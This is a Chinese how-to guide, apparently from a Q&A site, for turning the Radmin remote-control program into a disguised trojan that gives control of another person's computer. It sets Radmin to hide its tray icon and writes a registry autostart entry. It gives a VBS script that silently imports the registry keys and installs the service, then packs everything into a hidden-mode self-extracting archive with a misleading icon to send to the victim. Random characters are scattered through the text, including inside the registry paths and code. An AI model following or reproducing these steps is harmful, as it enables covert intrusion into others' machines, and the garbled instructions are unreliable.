问题补充说明:影子版 控制人家万象网管
一、radmin的配置
首先下载并解压Radmin。解压后有七个文件,打开“配置r_server”文件;
点选“注册信息”,把sn文件中的注册码复制他微围鸡粘贴到对话框中确定;
谈剂院模财误点击“设置密码”按钮进入设置密味动称较今妒临码窗口,为radmin设置不少鲜阶仍击提于8位的密码后确定;
点选“设置参数”按钮进入设置参数窗口,选中“隐藏状态栏图标”前的复选框,端口可以改也可以默认,然后确定。
最后点“安装服务”,确定后退出。好,radmin的配置完毕。
二、导出注册表信息
因为Radmin工作原理的特殊性,配置信息并非记录在服务端程序展混分称内,而是在相关的注委序的册表键值内,所以我们要导出注册表中的radmin信息。
打开注册表编辑器(开始->运行->输入regedit后回车),依次展开“HKEY_LOCAL_MACH卫试那INE\SYST测元将往数EM\
Radmin”键值项,在“radmin”键值项上右击选择“导出”,保存为名为r_server.reg的文件。
再依次展开“HKEY_LOCAL_MACHINE\SOFTWAR
E\Micr握氢练研皮osoft\Wind阳苦满冲剧拉陈感检官ows\CurrentVersion\Run”,在右边的窗口空白处右键单击,依次选择“新建”、“字符串值”,为新建的字符串起个名字,比如radmin,再在其上双击,在弹出的对话框的居参“数值数据”处填入唱切该阻顺友古右“C:\WINDOWS\system32\r_server.exe”(不包括引号)后确定,然后导出radmin项,名称为qidong.reg。
到此radmin的奏前期准备工作就做好了,下面来把它打造成完美木马。
三、打造完美木马
打开记事本,输入以下代码:
setws=wscript.createobject("***.shell")
ws.run"re心那gedit.exe/sr_s唱坐宣苏钢级菜父erver.reg",0
ws.run"regedit.exe/sqidong.reg",0
w办快银晶困问项s.run"r_server.ex她领种做续打供计煤钱e/install/silence",0
ws.run"色主离速货烟妒完兰r_server.exe/start",0
另存为yunxing.vbs。
把radmin32文件夹中的r_server.exe、AdmDll.dll、raddrv.dll三个文件以及r_server.reg、qidong.reg和刚才的yunxing.vbs共六个文件复制到同一目录下,然后同时选中它们,用鼠标选中这六个文件,单击鼠标右键,选择“添加到压缩文件”(前提是你安装了WINRAR)。
在弹出的对话框的“常规”选项卡的“存档选项”框中选中“创建自释放格式档案文件(X)”前的复选框,然后切换到“高级”选项卡,点选“SFX选项(X)”进入高级自释放选项设置:在这里的“常规”选项卡中的释放路径一栏处填入“C:\WINDOWS\system32”(不包括引号),在“释放后运行”里填入yunxing.vbs(注意填写文件扩展名)。再切换到“模式”选项卡,缄默模式设置成“全部隐藏”,覆盖方式设置成“覆盖所有文件”。切换到“文字和图标”选项卡,在“自定义SFX”框中点“浏览”选择一个迷惑性的图标。最后连续点击两次“确定”完成收尾工作。好,完美的木马已经打造完成,把这个木马传给你要控制的人,你就可以玩远程控制了。
四、radmin的使用
这里简单的说一下radmin的使用方法:打开Radmin.exe,选择“连接选项”->“连接到……”,在“连接类型”中选择你想要的功能,在“所连接的IP地址或DNS”中输入服务端的IP地址,然后点击“确定”,在弹出的对话框中输入你原先设置的密码,确定后就连接成功了。
注:本文以radmin(影子汉化版)为例。
标签:ra,dmin,来自
